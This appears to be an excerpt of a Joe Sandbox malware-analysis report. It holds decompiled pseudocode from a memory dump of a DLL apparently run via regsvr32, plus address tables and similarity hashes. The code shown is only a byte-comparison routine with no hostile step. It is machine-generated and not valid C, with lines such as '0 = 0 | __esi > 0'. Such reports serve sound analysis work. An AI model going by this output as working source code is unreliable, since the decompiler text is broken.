                                                                                                                											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
                                                                                                                											if(_t296 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											goto L64;
                                                                                                                										}
                                                                                                                										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
                                                                                                                										if(_t296 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L62;
                                                                                                                									}
                                                                                                                									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
                                                                                                                									if(_t296 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L60;
                                                                                                                								}
                                                                                                                								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
                                                                                                                								if(_t313 == 0) {
                                                                                                                									L49:
                                                                                                                									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
                                                                                                                									if(_t315 == 0) {
                                                                                                                										L51:
                                                                                                                										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
                                                                                                                										if(_t317 == 0) {
                                                                                                                											L53:
                                                                                                                											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
                                                                                                                											if(_t296 != 0) {
                                                                                                                												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                											}
                                                                                                                											goto L56;
                                                                                                                										}
                                                                                                                										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
                                                                                                                										if(_t296 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L53;
                                                                                                                									}
                                                                                                                									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
                                                                                                                									if(_t296 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L51;
                                                                                                                								}
                                                                                                                								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
                                                                                                                								if(_t296 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L49;
                                                                                                                							}
                                                                                                                							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
                                                                                                                							if(_t320 == 0) {
                                                                                                                								L38:
                                                                                                                								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
                                                                                                                								if(_t322 == 0) {
                                                                                                                									L40:
                                                                                                                									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
                                                                                                                									if(_t324 == 0) {
                                                                                                                										L42:
                                                                                                                										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
                                                                                                                										if(_t296 != 0) {
                                                                                                                											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                										}
                                                                                                                										goto L45;
                                                                                                                									}
                                                                                                                									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
                                                                                                                									if(_t296 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L42;
                                                                                                                								}
                                                                                                                								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
                                                                                                                								if(_t296 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L40;
                                                                                                                							}
                                                                                                                							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
                                                                                                                							if(_t296 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L38;
                                                                                                                						}
                                                                                                                						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
                                                                                                                						if(_t327 == 0) {
                                                                                                                							L27:
                                                                                                                							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
                                                                                                                							if(_t329 == 0) {
                                                                                                                								L29:
                                                                                                                								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
                                                                                                                								if(_t331 == 0) {
                                                                                                                									L31:
                                                                                                                									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
                                                                                                                									if(_t296 != 0) {
                                                                                                                										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                									}
                                                                                                                									goto L34;
                                                                                                                								}
                                                                                                                								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
                                                                                                                								if(_t296 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L31;
                                                                                                                							}
                                                                                                                							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
                                                                                                                							if(_t296 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L29;
                                                                                                                						}
                                                                                                                						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                                                                                                                						if(_t296 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L27;
                                                                                                                					}
                                                                                                                					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
                                                                                                                					if(_t334 == 0) {
                                                                                                                						L16:
                                                                                                                						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
                                                                                                                						if(_t336 == 0) {
                                                                                                                							L18:
                                                                                                                							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
                                                                                                                							if(_t338 == 0) {
                                                                                                                								L20:
                                                                                                                								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
                                                                                                                								if(_t296 != 0) {
                                                                                                                									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                								}
                                                                                                                								goto L23;
                                                                                                                							}
                                                                                                                							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
                                                                                                                							if(_t296 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L20;
                                                                                                                						}
                                                                                                                						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
                                                                                                                						if(_t296 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L18;
                                                                                                                					}
                                                                                                                					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                                                                                                                					if(_t296 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L16;
                                                                                                                				} else {
                                                                                                                					__esi = __dl & 0x000000ff;
                                                                                                                					__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                                					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                                					if(__esi == 0) {
                                                                                                                						L5:
                                                                                                                						__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                                						__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                						if(__esi == 0) {
                                                                                                                							L7:
                                                                                                                							__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L9:
                                                                                                                								__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                                								if(__esi != 0) {
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								}
                                                                                                                								goto L12;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L9;
                                                                                                                						}
                                                                                                                						0 = 0 | __esi > 0x00000000;
                                                                                                                						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                						__esi = __edx;
                                                                                                                						if(__edx != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                					0 = 0 | __esi > 0x00000000;
                                                                                                                					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                					__esi = __edx;
                                                                                                                					if(__edx != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L5;
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				_t184 = _t296;
                                                                                                                				goto L2;
                                                                                                                			}






























                                                                                                                0x1003dfd0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dfd0
                                                                                                                0x1003dfab
                                                                                                                0x1003dfaf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dfaf
                                                                                                                0x1003df8a
                                                                                                                0x1003df8e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dee5
                                                                                                                0x1003dee5
                                                                                                                0x1003dee8
                                                                                                                0x1003deec
                                                                                                                0x1003deee
                                                                                                                0x1003df05
                                                                                                                0x1003df05
                                                                                                                0x1003df09
                                                                                                                0x1003df0d
                                                                                                                0x1003df0f
                                                                                                                0x1003df26
                                                                                                                0x1003df26
                                                                                                                0x1003df2a
                                                                                                                0x1003df2e
                                                                                                                0x1003df30
                                                                                                                0x1003df47
                                                                                                                0x1003df47
                                                                                                                0x1003df4b
                                                                                                                0x1003df4f
                                                                                                                0x1003df51
                                                                                                                0x1003df57
                                                                                                                0x1003df5a
                                                                                                                0x1003df5e
                                                                                                                0x1003df5e
                                                                                                                0x00000000
                                                                                                                0x1003df51
                                                                                                                0x1003df36
                                                                                                                0x1003df39
                                                                                                                0x1003df3d
                                                                                                                0x1003df41
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003df41
                                                                                                                0x1003df15
                                                                                                                0x1003df18
                                                                                                                0x1003df1c
                                                                                                                0x1003df20
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003df20
                                                                                                                0x1003def4
                                                                                                                0x1003def7
                                                                                                                0x1003defb
                                                                                                                0x1003deff
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003deff
                                                                                                                0x1003db02
                                                                                                                0x1003db02
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                • Instruction ID: d8d6a0d1d601d6d19846f2a888380698ae7eb6c7cf68485d33b6dbe59a4135aa
                                                                                                                • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                • Instruction Fuzzy Hash: D5C17EB3C0A9F34E8377C52D546862BEEA2AFC169271BC3E2CCD43F289D6265D0495D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003DB09(void* __eax, void* __ecx) {
                                                                                                                				void* _t177;
                                                                                                                				signed int _t178;
                                                                                                                				void* _t181;
                                                                                                                				signed char _t187;
                                                                                                                				signed char _t188;
                                                                                                                				signed char _t189;
                                                                                                                				signed char _t191;
                                                                                                                				signed char _t192;
                                                                                                                				signed int _t198;
                                                                                                                				signed int _t284;
                                                                                                                				void* _t287;
                                                                                                                				void* _t289;
                                                                                                                				void* _t291;
                                                                                                                				void* _t293;
                                                                                                                				void* _t295;
                                                                                                                				void* _t297;
                                                                                                                				void* _t300;
                                                                                                                				void* _t302;
                                                                                                                				void* _t304;
                                                                                                                				void* _t307;
                                                                                                                				void* _t309;
                                                                                                                				void* _t311;
                                                                                                                				void* _t314;
                                                                                                                				void* _t316;
                                                                                                                				void* _t318;
                                                                                                                				void* _t321;
                                                                                                                				void* _t323;
                                                                                                                				void* _t325;
                                                                                                                
                                                                                                                				_t181 = __ecx;
                                                                                                                				_t177 = __eax;
                                                                                                                				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
                                                                                                                					_t284 = 0;
                                                                                                                					L11:
                                                                                                                					if(_t284 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					_t187 =  *(_t177 - 0x18);
                                                                                                                					if(_t187 ==  *(_t181 - 0x18)) {
                                                                                                                						_t284 = 0;
                                                                                                                						L22:
                                                                                                                						if(_t284 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						_t188 =  *(_t177 - 0x14);
                                                                                                                						if(_t188 ==  *(_t181 - 0x14)) {
                                                                                                                							_t284 = 0;
                                                                                                                							L33:
                                                                                                                							if(_t284 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							_t189 =  *(_t177 - 0x10);
                                                                                                                							if(_t189 ==  *(_t181 - 0x10)) {
                                                                                                                								_t284 = 0;
                                                                                                                								L44:
                                                                                                                								if(_t284 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
                                                                                                                									_t284 = 0;
                                                                                                                									L55:
                                                                                                                									if(_t284 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									_t191 =  *(_t177 - 8);
                                                                                                                									if(_t191 ==  *(_t181 - 8)) {
                                                                                                                										_t284 = 0;
                                                                                                                										L66:
                                                                                                                										if(_t284 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										_t192 =  *(_t177 - 4);
                                                                                                                										if(_t192 ==  *(_t181 - 4)) {
                                                                                                                											_t178 = 0;
                                                                                                                											L78:
                                                                                                                											if(_t178 == 0) {
                                                                                                                												_t178 = 0;
                                                                                                                											}
                                                                                                                											L80:
                                                                                                                											return _t178;
                                                                                                                										}
                                                                                                                										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
                                                                                                                										if(_t287 == 0) {
                                                                                                                											L70:
                                                                                                                											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
                                                                                                                											if(_t289 == 0) {
                                                                                                                												L72:
                                                                                                                												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
                                                                                                                												if(_t291 == 0) {
                                                                                                                													L75:
                                                                                                                													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
                                                                                                                													if(_t178 != 0) {
                                                                                                                														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
                                                                                                                													}
                                                                                                                													goto L78;
                                                                                                                												}
                                                                                                                												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
                                                                                                                												if(_t198 == 0) {
                                                                                                                													goto L75;
                                                                                                                												}
                                                                                                                												L74:
                                                                                                                												_t178 = _t198;
                                                                                                                												goto L78;
                                                                                                                											}
                                                                                                                											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
                                                                                                                											if(_t198 != 0) {
                                                                                                                												goto L74;
                                                                                                                											}
                                                                                                                											goto L72;
                                                                                                                										}
                                                                                                                										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
                                                                                                                										if(_t198 != 0) {
                                                                                                                											goto L74;
                                                                                                                										}
                                                                                                                										goto L70;
                                                                                                                									}
                                                                                                                									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
                                                                                                                									if(_t293 == 0) {
                                                                                                                										L59:
                                                                                                                										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
                                                                                                                										if(_t295 == 0) {
                                                                                                                											L61:
                                                                                                                											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
                                                                                                                											if(_t297 == 0) {
                                                                                                                												L63:
                                                                                                                												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
                                                                                                                												if(_t284 != 0) {
                                                                                                                													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                                												}
                                                                                                                												goto L66;
                                                                                                                											}
                                                                                                                											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
                                                                                                                											if(_t284 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											goto L63;
                                                                                                                										}
                                                                                                                										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
                                                                                                                										if(_t284 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L61;
                                                                                                                									}
                                                                                                                									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
                                                                                                                									if(_t284 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L59;
                                                                                                                								}
                                                                                                                								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
                                                                                                                								if(_t300 == 0) {
                                                                                                                									L48:
                                                                                                                									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
                                                                                                                									if(_t302 == 0) {
                                                                                                                										L50:
                                                                                                                										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
                                                                                                                										if(_t304 == 0) {
                                                                                                                											L52:
                                                                                                                											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
                                                                                                                											if(_t284 != 0) {
                                                                                                                												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                                											}
                                                                                                                											goto L55;
                                                                                                                										}
                                                                                                                										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
                                                                                                                										if(_t284 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L52;
                                                                                                                									}
                                                                                                                									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
                                                                                                                									if(_t284 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L50;
                                                                                                                								}
                                                                                                                								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
                                                                                                                								if(_t284 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L48;
                                                                                                                							}
                                                                                                                							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
                                                                                                                							if(_t307 == 0) {
                                                                                                                								L37:
                                                                                                                								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
                                                                                                                								if(_t309 == 0) {
                                                                                                                									L39:
                                                                                                                									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
                                                                                                                									if(_t311 == 0) {
                                                                                                                										L41:
                                                                                                                										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
                                                                                                                										if(_t284 != 0) {
                                                                                                                											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                                										}
                                                                                                                										goto L44;
                                                                                                                									}
                                                                                                                									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
                                                                                                                									if(_t284 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L41;
                                                                                                                								}
                                                                                                                								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                                								if(_t284 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L39;
                                                                                                                							}
                                                                                                                							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
                                                                                                                							if(_t284 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L37;
                                                                                                                						}
                                                                                                                						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
                                                                                                                						if(_t314 == 0) {
                                                                                                                							L26:
                                                                                                                							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
                                                                                                                							if(_t316 == 0) {
                                                                                                                								L28:
                                                                                                                								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
                                                                                                                								if(_t318 == 0) {
                                                                                                                									L30:
                                                                                                                									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
                                                                                                                									if(_t284 != 0) {
                                                                                                                										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                                									}
                                                                                                                									goto L33;
                                                                                                                								}
                                                                                                                								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                                                                                                                								if(_t284 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L30;
                                                                                                                							}
                                                                                                                							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                							if(_t284 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L28;
                                                                                                                						}
                                                                                                                						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                                                                                                                						if(_t284 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L26;
                                                                                                                					}
                                                                                                                					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
                                                                                                                					if(_t321 == 0) {
                                                                                                                						L15:
                                                                                                                						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
                                                                                                                						if(_t323 == 0) {
                                                                                                                							L17:
                                                                                                                							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
                                                                                                                							if(_t325 == 0) {
                                                                                                                								L19:
                                                                                                                								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
                                                                                                                								if(_t284 != 0) {
                                                                                                                									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                                								}
                                                                                                                								goto L22;
                                                                                                                							}
                                                                                                                							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                                                							if(_t284 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                                                						if(_t284 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                                                					if(_t284 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L15;
                                                                                                                				} else {
                                                                                                                					__esi = __dl & 0x000000ff;
                                                                                                                					__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                					if(__esi == 0) {
                                                                                                                						L4:
                                                                                                                						__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                                						__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                						if(__esi == 0) {
                                                                                                                							L6:
                                                                                                                							__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                                							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L8:
                                                                                                                								__esi =  *(__eax - 0x19) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x19) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                                                                                                                								if(__esi != 0) {
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								}
                                                                                                                								goto L11;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                						0 = 0 | __esi > 0x00000000;
                                                                                                                						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                						__esi = __edx;
                                                                                                                						if(__edx != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                					0 = 0 | __esi > 0x00000000;
                                                                                                                					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                					__esi = __edx;
                                                                                                                					if(__edx != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				_t178 = _t284;
                                                                                                                				goto L80;
                                                                                                                			}































                                                                                                                0x1003de5e
                                                                                                                0x1003decf
                                                                                                                0x1003ded1
                                                                                                                0x1003ded3
                                                                                                                0x1003ded5
                                                                                                                0x1003ded5
                                                                                                                0x1003ded7
                                                                                                                0x1003ec33
                                                                                                                0x1003ec33
                                                                                                                0x1003de67
                                                                                                                0x1003de69
                                                                                                                0x1003de7a
                                                                                                                0x1003de82
                                                                                                                0x1003de84
                                                                                                                0x1003de95
                                                                                                                0x1003de9d
                                                                                                                0x1003de9f
                                                                                                                0x1003deb4
                                                                                                                0x1003debc
                                                                                                                0x1003debe
                                                                                                                0x1003decb
                                                                                                                0x1003decb
                                                                                                                0x00000000
                                                                                                                0x1003debe
                                                                                                                0x1003dea8
                                                                                                                0x1003deae
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003deb0
                                                                                                                0x1003deb0
                                                                                                                0x00000000
                                                                                                                0x1003deb0
                                                                                                                0x1003de8d
                                                                                                                0x1003de93
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003de93
                                                                                                                0x1003de72
                                                                                                                0x1003de78
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003de78
                                                                                                                0x1003ddd8
                                                                                                                0x1003ddda
                                                                                                                0x1003ddf1
                                                                                                                0x1003ddf9
                                                                                                                0x1003ddfb
                                                                                                                0x1003de12
                                                                                                                0x1003de1a
                                                                                                                0x1003de1c
                                                                                                                0x1003de33
                                                                                                                0x1003de3b
                                                                                                                0x1003de3d
                                                                                                                0x1003de4a
                                                                                                                0x1003de4a
                                                                                                                0x00000000
                                                                                                                0x1003de3d
                                                                                                                0x1003de29
                                                                                                                0x1003de2d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003de2d
                                                                                                                0x1003de08
                                                                                                                0x1003de0c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003de0c
                                                                                                                0x1003dde7
                                                                                                                0x1003ddeb
                                                                                                                0x00000000
                                                                                                                0x00000000
